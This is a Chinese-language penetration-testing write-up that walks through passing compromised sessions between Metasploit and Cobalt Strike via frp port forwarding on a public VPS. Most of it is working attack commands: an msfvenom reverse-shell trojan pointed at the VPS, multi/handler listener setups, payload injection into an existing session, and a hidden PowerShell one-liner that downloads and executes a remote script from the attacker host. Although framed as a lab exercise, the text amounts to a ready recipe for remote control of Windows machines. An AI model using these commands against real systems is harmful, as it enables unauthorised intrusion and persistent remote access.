很糙的寫一下,利用公網進行內網msf接收公網cs派生session。
在去年任務比較多,挖掘內網往往沒利用msf進行滲透,只用cs進行滲透是比較麻煩的,做滲透還是用msf比較舒服。
實驗環境:
VPS:windows 2008 R2 IP:123.56.xx.xx
靶機:windows 7 IP:192.168.138.150
攻擊機:kali 2019.04 IP:192.168.243.129
實驗工具:
vps:cs 3.14 、frp、木馬
靶機:cs木馬、msf木馬
攻擊機:frp、msfconsole、cs 3.14客戶端
前提是getshell。或者利用cs遠程木馬上線等等,直接是測試cs和msf之間的session派生。
目錄:
一、利用msf上線靶機
二、利用msf給cs派生session
三、利用cs上線靶機
四、利用cs給msf派生session
五、總結
一、利用msf上線靶機
講解:利用frp將內網一個端口給映射到公網IP;在利用msfvenom生成msf木馬;
Frp映射端口:
Kali端:(frpc.ini)
[common] server_addr = 123.56.xx.xx server_port = 7000 [socks5_2] type = tcp local_ip = 127.0.0.1 local_port = 1212 remote_port = 1212

Vps端:
不需要配置,直接運行:
./frps -c frps.ini


Kali端運行:


生成msf木馬:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=123.56.xx.xx LPORT=1212 -f exe > /root/test.exe


上msf配置模塊:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 123.56.xx.xx
set lport 1212
run


靶機:
運行test.exe


攻擊機Kali:(msf收到session)


二、利用msf給cs派生session
Kali:
Session 1


cs配置:


Msf配置:
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true #默認情況下,payload_inject執行之后會在本地產生一個新的handler,由於我們已經有了一個,所以不需要在產生一個,所以這里我們設置為true set lhost 123.56.xx.xx #cobaltstrike監聽的ip set lport 12121 #cobaltstrike監聽的端口 set session 1 #這里是獲得的session的id run


已經派生成功。
一般收集信息還是用msf進行信息收集,msf功能較強大。Cs用來上線主機,支持遠程木馬上傳。
三、利用cs上線靶機
frp端口映射:
Kali端:(frpc.ini)
[common] server_addr = 123.56.xx.xx server_port = 7000 [socks5_2] type = tcp local_ip = 127.0.0.1 # 本地kali地址。 local_port = 1212 remote_port = 1212
生成cs遠程木馬:
生成powershell木馬。使用是winds 7存在powershell。



設置遠程木馬下載:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://123.56.xx.xx:803/a'))"
成功上線:


四、利用cs給msf派生session
Smf配置:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.243.129#需設置本地IP地址 set lport 1212 run

CS配置:



成功頁面不在截圖,忘記截圖了,監聽就能直接過來了。
五、總結
1、kali中的ip需要設置本地ip
2、利用frp作為端口轉發,端口設置需要配置好
3、在進行cs派生的時候遇到問題,就是派生不過來,最后利用騰訊雲服務器成功派生
4、cs中的派生模塊和kali中msf模塊需要一致,例如:用http就都需要設置,用tcp都需要一樣
比較菜,多見諒。